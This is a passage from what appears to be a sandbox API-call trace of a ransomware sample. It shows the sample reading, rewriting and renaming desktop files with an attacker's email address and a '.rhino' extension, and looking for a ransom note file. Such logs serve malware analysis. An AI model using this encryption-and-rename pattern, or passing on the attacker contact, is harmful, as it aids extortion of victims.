lpBuffer=0x744ce0*, nNumberOfBytesToWrite=0x471f, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x744ce0*, lpNumberOfBytesWritten=0x4af2ac*=0x471f, lpOverlapped=0x0) returned 1 [0078.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.387] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x471f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.387] CloseHandle (hObject=0x124) returned 1 [0078.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0078.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0078.389] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0078.389] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\duNAoMsaky.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dunaomsaky.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\duNAoMsaky.xlsx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dunaomsaky.xlsx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.395] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.395] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\e6vzzyd4iS6Nzn0.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e6vzzyd4is6nzn0.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.395] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x6ab [0078.395] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7cb, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.395] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.396] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.397] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.397] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x6ab, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x6ab, lpOverlapped=0x0) returned 1 [0078.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.397] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.398] GetLastError () returned 0x0 [0078.398] SetLastError (dwErrCode=0x0) [0078.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ab) returned 0x6ee498 [0078.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.398] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6eeb50 [0078.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.400] WriteFile (in: hFile=0x124, lpBuffer=0x6eeb50*, nNumberOfBytesToWrite=0x7cb, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x6eeb50*, lpNumberOfBytesWritten=0x4af2ac*=0x7cb, lpOverlapped=0x0) returned 1 [0078.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eeb50 | out: hHeap=0x6d0000) returned 1 [0078.400] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7cb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.400] CloseHandle (hObject=0x124) returned 1 [0078.403] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.403] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0078.403] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.403] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\e6vzzyd4iS6Nzn0.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e6vzzyd4is6nzn0.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\e6vzzyd4iS6Nzn0.xls.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e6vzzyd4is6nzn0.xls.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eG_eSoP3GaS5ub.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eg_esop3gas5ub.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.405] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x10c90 [0078.405] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10db0, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.405] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.405] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.406] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.407] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x10c90, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x10c90, lpOverlapped=0x0) returned 1 [0078.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.407] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.408] GetLastError () returned 0x0 [0078.408] SetLastError (dwErrCode=0x0) [0078.408] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10cb3) returned 0x744cd8 [0078.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.411] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.413] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0078.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0078.414] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x755998 [0078.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75c478 [0078.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x755998 | out: hHeap=0x6d0000) returned 1 [0078.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x7664a8 [0078.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c478 | out: hHeap=0x6d0000) returned 1 [0078.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x7754e0 [0078.418] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7664a8 | out: hHeap=0x6d0000) returned 1 [0078.418] WriteFile (in: hFile=0x124, lpBuffer=0x775500*, nNumberOfBytesToWrite=0x10db0, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x775500*, lpNumberOfBytesWritten=0x4af2ac*=0x10db0, lpOverlapped=0x0) returned 1 [0078.419] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7754e0 | out: hHeap=0x6d0000) returned 1 [0078.419] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10db0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.419] CloseHandle (hObject=0x124) returned 1 [0078.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0078.425] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.425] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eG_eSoP3GaS5ub.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eg_esop3gas5ub.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eG_eSoP3GaS5ub.swf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eg_esop3gas5ub.swf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.428] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.428] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EUG9E.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eug9e.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.428] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x263e [0078.428] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x275e, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.428] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.428] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.430] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.430] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x263e, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x263e, lpOverlapped=0x0) returned 1 [0078.430] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.430] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.430] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 